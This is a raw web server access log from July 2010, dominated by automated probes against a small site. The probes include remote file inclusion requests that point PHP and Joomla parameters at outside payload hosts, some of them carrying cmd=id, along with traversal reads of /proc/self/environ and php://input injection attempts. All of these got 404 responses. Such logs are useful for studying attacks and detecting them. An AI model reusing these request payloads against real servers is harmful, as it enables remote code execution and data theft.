81.208.34.38 - - [27/Jul/2010:10:33:03 -0700] "GET /includes/tgpinc.php?DOCUMENT_ROOT=http://carollia.indelec.cz/Meatio_Develop/code/SA_Scripts/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "redneckmba.com"
81.208.34.38 - - [27/Jul/2010:10:33:03 -0700] "GET /logs//includes/tgpinc.php?DOCUMENT_ROOT=http://carollia.indelec.cz/Meatio_Develop/code/SA_Scripts/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
81.208.34.38 - - [27/Jul/2010:10:33:03 -0700] "GET /includes/tgpinc.php?DOCUMENT_ROOT=http://carollia.indelec.cz/Meatio_Develop/code/SA_Scripts/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
72.3.179.234 - - [27/Jul/2010:10:33:28 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
72.3.179.234 - - [27/Jul/2010:10:33:28 -0700] "GET /logs/access.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
72.3.179.234 - - [27/Jul/2010:10:33:28 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.29.8 - - [27/Jul/2010:10:33:32 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.29.8 - - [27/Jul/2010:10:33:32 -0700] "GET /logs/access.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.29.8 - - [27/Jul/2010:10:33:32 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
178.63.10.52 - - [27/Jul/2010:10:34:08 -0700] "GET /logs/access_100329.log//appserv/main.php?appserv_root=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
178.63.10.52 - - [27/Jul/2010:10:34:08 -0700] "GET /appserv/main.php?appserv_root=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
178.63.10.52 - - [27/Jul/2010:10:34:08 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.29.8 - - [27/Jul/2010:10:34:09 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.29.8 - - [27/Jul/2010:10:34:09 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.29.8 - - [27/Jul/2010:10:34:11 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.13.123.194 - - [27/Jul/2010:10:35:07 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
178.63.10.52 - - [27/Jul/2010:10:37:45 -0700] "GET /logs/access_100621.log//appserv/main.php?appserv_root=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
178.63.10.52 - - [27/Jul/2010:10:37:45 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
178.63.10.52 - - [27/Jul/2010:10:37:45 -0700] "GET /appserv/main.php?appserv_root=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
81.208.34.38 - - [27/Jul/2010:10:38:08 -0700] "GET /logs/access.log//includes/tgpinc.php?DOCUMENT_ROOT=http://carollia.indelec.cz/Meatio_Develop/code/SA_Scripts/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
81.208.34.38 - - [27/Jul/2010:10:38:09 -0700] "GET /includes/tgpinc.php?DOCUMENT_ROOT=http://carollia.indelec.cz/Meatio_Develop/code/SA_Scripts/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
81.208.34.38 - - [27/Jul/2010:10:38:09 -0700] "GET /logs//includes/tgpinc.php?DOCUMENT_ROOT=http://carollia.indelec.cz/Meatio_Develop/code/SA_Scripts/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
81.208.34.38 - - [27/Jul/2010:10:38:40 -0700] "GET /logs/access.log//includes/tgpinc.php?DOCUMENT_ROOT=http://carollia.indelec.cz/Meatio_Develop/code/SA_Scripts/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
81.208.34.38 - - [27/Jul/2010:10:38:40 -0700] "GET /includes/tgpinc.php?DOCUMENT_ROOT=http://carollia.indelec.cz/Meatio_Develop/code/SA_Scripts/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
81.208.34.38 - - [27/Jul/2010:10:38:40 -0700] "GET /logs//includes/tgpinc.php?DOCUMENT_ROOT=http://carollia.indelec.cz/Meatio_Develop/code/SA_Scripts/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
118.129.166.221 - - [27/Jul/2010:10:39:10 -0700] "GET /logs/access_100329.log//appserv/main.php?appserv_root=http://upload.m-turk.nl/uploadsfiles/bobrok1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
118.129.166.221 - - [27/Jul/2010:10:39:10 -0700] "GET /appserv/main.php?appserv_root=http://upload.m-turk.nl/uploadsfiles/bobrok1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
118.129.166.221 - - [27/Jul/2010:10:39:10 -0700] "GET /logs//appserv/main.php?appserv_root=http://upload.m-turk.nl/uploadsfiles/bobrok1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
81.208.34.38 - - [27/Jul/2010:10:56:43 -0700] "GET /logs/access_100614.log//includes/tgpinc.php?DOCUMENT_ROOT=http://carollia.indelec.cz/Meatio_Develop/code/SA_Scripts/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
81.208.34.38 - - [27/Jul/2010:10:56:49 -0700] "GET /logs/access_100614.log//includes/tgpinc.php?DOCUMENT_ROOT=http://carollia.indelec.cz/Meatio_Develop/code/SA_Scripts/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
80.89.233.48 - - [27/Jul/2010:10:58:00 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
178.63.10.52 - - [27/Jul/2010:10:58:15 -0700] "GET /appserv/main.php?appserv_root=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
178.63.10.52 - - [27/Jul/2010:10:58:15 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
178.63.10.52 - - [27/Jul/2010:10:58:15 -0700] "GET /logs/access_100329.log//appserv/main.php?appserv_root=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
80.89.233.48 - - [27/Jul/2010:10:58:59 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
77.232.90.201 - - [27/Jul/2010:11:01:31 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "redneckmba.com"
77.232.90.201 - - [27/Jul/2010:11:01:31 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "redneckmba.com"
178.63.10.52 - - [27/Jul/2010:11:01:39 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
178.63.10.52 - - [27/Jul/2010:11:01:39 -0700] "GET /appserv/main.php?appserv_root=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
178.63.10.52 - - [27/Jul/2010:11:01:40 -0700] "GET /logs/access_100621.log//appserv/main.php?appserv_root=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
77.232.90.201 - - [27/Jul/2010:11:09:31 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
77.232.90.201 - - [27/Jul/2010:11:12:46 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
77.232.90.201 - - [27/Jul/2010:11:12:46 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
77.232.90.201 - - [27/Jul/2010:11:12:47 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
80.89.233.48 - - [27/Jul/2010:11:12:55 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
80.89.233.48 - - [27/Jul/2010:11:12:55 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
80.89.233.48 - - [27/Jul/2010:11:12:55 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
209.34.196.162 - - [27/Jul/2010:11:18:02 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
209.34.196.162 - - [27/Jul/2010:11:18:02 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
209.34.196.162 - - [27/Jul/2010:11:18:02 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
80.89.233.48 - - [27/Jul/2010:11:23:05 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
80.89.233.48 - - [27/Jul/2010:11:23:05 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
80.89.233.48 - - [27/Jul/2010:11:23:05 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
76.13.114.107 - - [27/Jul/2010:11:27:40 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
209.34.196.162 - - [27/Jul/2010:11:29:03 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
209.34.196.162 - - [27/Jul/2010:11:29:06 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
209.34.196.162 - - [27/Jul/2010:11:29:07 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
209.34.196.162 - - [27/Jul/2010:11:33:45 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
209.34.196.162 - - [27/Jul/2010:11:33:48 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
209.34.196.162 - - [27/Jul/2010:11:33:49 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
66.163.171.207 - - [27/Jul/2010:11:34:13 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
209.34.196.162 - - [27/Jul/2010:11:34:36 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
209.34.196.162 - - [27/Jul/2010:11:34:36 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
209.34.196.162 - - [27/Jul/2010:11:34:36 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
66.249.65.54 - - [27/Jul/2010:11:37:33 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "redneckmba.com"
77.232.90.201 - - [27/Jul/2010:11:42:23 -0700] "GET /logs/access_100614.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
72.38.78.210 - - [27/Jul/2010:11:46:08 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
72.38.78.210 - - [27/Jul/2010:11:47:05 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
72.38.78.210 - - [27/Jul/2010:11:47:21 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
72.38.78.210 - - [27/Jul/2010:11:53:45 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
72.38.78.210 - - [27/Jul/2010:11:53:45 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
72.38.78.210 - - [27/Jul/2010:11:53:50 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
72.38.78.210 - - [27/Jul/2010:11:54:11 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
72.38.78.210 - - [27/Jul/2010:11:54:16 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
72.38.78.210 - - [27/Jul/2010:11:54:16 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
72.38.78.210 - - [27/Jul/2010:11:54:16 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
72.38.78.210 - - [27/Jul/2010:11:54:21 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
72.38.78.210 - - [27/Jul/2010:11:54:21 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
208.80.193.39 - - [27/Jul/2010:11:55:04 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.6-embedded; rev1.6; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "redneckmba.com"
93.158.149.32 - - [27/Jul/2010:12:01:33 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.redneckmba.com"
76.13.123.194 - - [27/Jul/2010:12:01:47 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
220.125.208.51 - - [27/Jul/2010:12:04:13 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
220.125.208.51 - - [27/Jul/2010:12:04:13 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
220.125.208.51 - - [27/Jul/2010:12:04:13 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
220.125.208.51 - - [27/Jul/2010:12:04:14 -0700] "POST /logs/access.log//index.php?option=com_gcalendar&controller=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.redneckmba.com"
220.125.208.51 - - [27/Jul/2010:12:04:14 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
220.125.208.51 - - [27/Jul/2010:12:04:15 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
220.125.208.51 - - [27/Jul/2010:12:04:15 -0700] "GET /index.php?option=com_gcalendar&controller=....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
220.125.208.51 - - [27/Jul/2010:12:04:16 -0700] "POST /index.php?option=com_gcalendar&controller=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.redneckmba.com"
220.125.208.51 - - [27/Jul/2010:12:04:16 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
220.125.208.51 - - [27/Jul/2010:12:04:16 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
220.125.208.51 - - [27/Jul/2010:12:04:17 -0700] "GET /logs//index.php?option=com_gcalendar&controller=....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
220.125.208.51 - - [27/Jul/2010:12:04:17 -0700] "POST /logs//index.php?option=com_gcalendar&controller=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.redneckmba.com"
209.34.196.162 - - [27/Jul/2010:12:09:14 -0700] "GET /logs/access_100614.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
209.34.196.162 - - [27/Jul/2010:12:10:50 -0700] "GET /logs/access_100614.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
209.34.196.162 - - [27/Jul/2010:12:11:00 -0700] "GET /logs/access_100614.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
76.13.114.107 - - [27/Jul/2010:12:32:04 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
95.108.150.235 - - [27/Jul/2010:12:33:55 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "redneckmba.com"
95.108.150.235 - - [27/Jul/2010:12:33:55 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "www.redneckmba.com"
95.108.150.235 - - [27/Jul/2010:12:34:00 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "redneckmba.com"
95.108.150.235 - - [27/Jul/2010:12:34:00 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "www.redneckmba.com"
95.108.150.235 - - [27/Jul/2010:12:34:01 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "redneckmba.com"
95.108.150.235 - - [27/Jul/2010:12:34:01 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "www.redneckmba.com"
72.38.78.210 - - [27/Jul/2010:12:42:06 -0700] "GET /logs/access_100614.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
72.38.78.210 - - [27/Jul/2010:12:42:40 -0700] "GET /logs/access_100614.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
72.38.78.210 - - [27/Jul/2010:12:45:50 -0700] "GET /logs/access_100614.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
66.163.171.206 - - [27/Jul/2010:12:46:39 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
204.15.125.1 - - [27/Jul/2010:12:46:50 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.vifoga.org/portal/templates/system/html/service.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
208.38.36.33 - - [27/Jul/2010:12:50:15 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.vifoga.org/portal/templates/system/html/service.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
24.182.140.85 - - [27/Jul/2010:12:50:50 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.vifoga.org/portal/templates/system/html/service.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.redneckmba.com"
78.173.24.22 - - [27/Jul/2010:12:58:44 -0700] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://hepatit.byethost7.com/57.dat?&list=1&cmd=id HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)" "redneckmba.com"
78.173.24.22 - - [27/Jul/2010:13:02:26 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://hepatit.byethost7.com/57.dat?&list=1&cmd=id HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)" "redneckmba.com"
204.236.235.245 - - [27/Jul/2010:13:05:12 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)" "www.redneckmba.com"
204.236.235.245 - - [27/Jul/2010:13:05:01 -0700] "GET / HTTP/1.0" 200 763 "-" "ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)" "www.redneckmba.com"
66.71.245.122 - - [27/Jul/2010:13:18:56 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
